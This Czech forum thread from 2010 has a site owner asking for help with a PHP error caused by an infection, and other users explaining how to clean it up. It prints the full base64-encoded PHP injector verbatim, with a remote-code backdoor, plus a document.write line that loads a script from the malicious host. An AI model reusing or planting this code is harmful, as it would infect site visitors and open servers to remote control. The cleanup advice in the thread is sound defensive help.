Autor | Zpráva | ||
---|---|---|---|
qwake Profil * |
#1 · Zasláno: 7. 7. 2010, 09:18:44
Dobrý den,
včera jsem hledal problém na stránkách, které ukazovaly malware. Byl tam odkaz na nějaký šílený skript, tak jsem ho smazal. Udělal si zálohu - kterou mi antivir smazal. Když jsem se na stránky podíval, tak tam na mě čekala chyba. Fatal error: Cannot redeclare q829() (previously declared in /var/www/web2/vprint.cz/vprint.cz/system/application/config/constants.php(1) : eval()'d code:1) in /var/www/web2/vprint.cz/vprint.cz/system/language/english/db_lang.php(1) : eval()'d code on line 1 Řádek, kde je prý chyba. <?php eval(base64_decode('aWYoIWlzc2V0KCRxODI5MSkpe2Z1bmN0aW9uIHE4MjkoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwyMXBabU52Ym5OMWJIUnBibWN1Ym1WMEwzUnRjQzl6WlhKMmFXTmxjeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIHE4MjkyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHE4MjkxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRxODI5MSkpY2FsbF91c2VyX2Z1bmMoJHE4MjkxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3E4MjknKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncTgyOScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRxODI5bD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigncTgyOTInKSkhPSdxODI5MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?> Nevíte, na jakou stránku to mohlo odkazovat? Díky moc. |
||
nightfish Profil |
#2 · Zasláno: 7. 7. 2010, 09:21:33
qwake:
„Nevíte, na jakou stránku to mohlo odkazovat?“ http:// mifconsulting . net / tmp / services.php „Cannot redeclare q829() (previously declared in /var/www/web2/vprint.cz/vprint.cz/system/application/config/constants.php(1) : eval()'d code:1) in /var/www/web2/vprint.cz/vprint.cz/system/language/english/db_lang.php(1)“ a vyčistil jsi i soubory constants.php a db_lang.php? |
||
qwake Profil * |
#3 · Zasláno: 7. 7. 2010, 09:31:00
Sice jsem nic nečistil, ale předtím to fungovalo...
|
||
nightfish Profil |
#4 · Zasláno: 7. 7. 2010, 09:35:05
qwake:
„Sice jsem nic nečistil, ale předtím to fungovalo...“ To, že něco fungovalo, neznamená, že to kromě běžné funkce nedělalo i něco dalšího - např. zavirovávalo tvé návštěvníky. Doporučuji mrknout na http://diskuse.jakpsatweb.cz/?action=vthread&forum=1&topic=96004 |
||
qwake Profil * |
#5 · Zasláno: 7. 7. 2010, 10:00:07
V těch souborech chybu nevidím. (constants.php a db_lang.php)
Byly tam 2 nějaké řádky, ale vůbec netuším jaké. I přes přidání to nefunguje... document.write(‘<script src=http://mifconsulting.net/tmp/services.php>'); |
||
nightfish Profil |
#6 · Zasláno: 7. 7. 2010, 10:12:15
qwake:
„Byly tam 2 nějaké řádky, ale vůbec netuším jaké“ Pak je dost pravděpodobné, že tam neměly co dělat. „I přes přidání to nefunguje...“ Nic nepřidávat, podezřelý kód vždy mazat. |
||
Joker Profil |
#7 · Zasláno: 7. 7. 2010, 10:26:00
qwake:
Já bych doporučoval nahrát celý web znovu ze zálohy, protože bůhví ve kterých souborech to všude je. Není-li záloha, nechal bych globálně přes všechny soubory vyhledat „eval(“, s velkou pravděpodobností všechny výskyty budou ten virus. „Byly tam 2 nějaké řádky, ale vůbec netuším jaké. I přes přidání to nefunguje...“ Přidání?! Něco jako manuální zavirování webu? :-) |
||
qwake Profil * |
#8 · Zasláno: 7. 7. 2010, 10:27:38
Já tímto spíše chtěl zjistit, jestli to bylo to, proč to nefunguje. Když jsem ten odkaz otevřel v prohlížeči, tak jsem dostal hned hlášení o malwaru... nějak jsem neplánoval ho tam znovu dávat, ale rád bych zjistil, jako co fungoval. Ten kód jsem nepsal já a moc se v něm ještě neorientuju.
|
||
nightfish Profil |
#9 · Zasláno: 7. 7. 2010, 10:52:08
qwake:
„Já tímto spíše chtěl zjistit, jestli to bylo to, proč to nefunguje“ Ano, autor toho malwaru byl amatér, a tak dvakrát deklaroval funkci se stejným názvem (např. v důsledku includování jiného zavirovaného souboru). Smazáním všech těch eval(base64...) se příčina chyby napraví. |
||
Časová prodleva: 14 let
|
0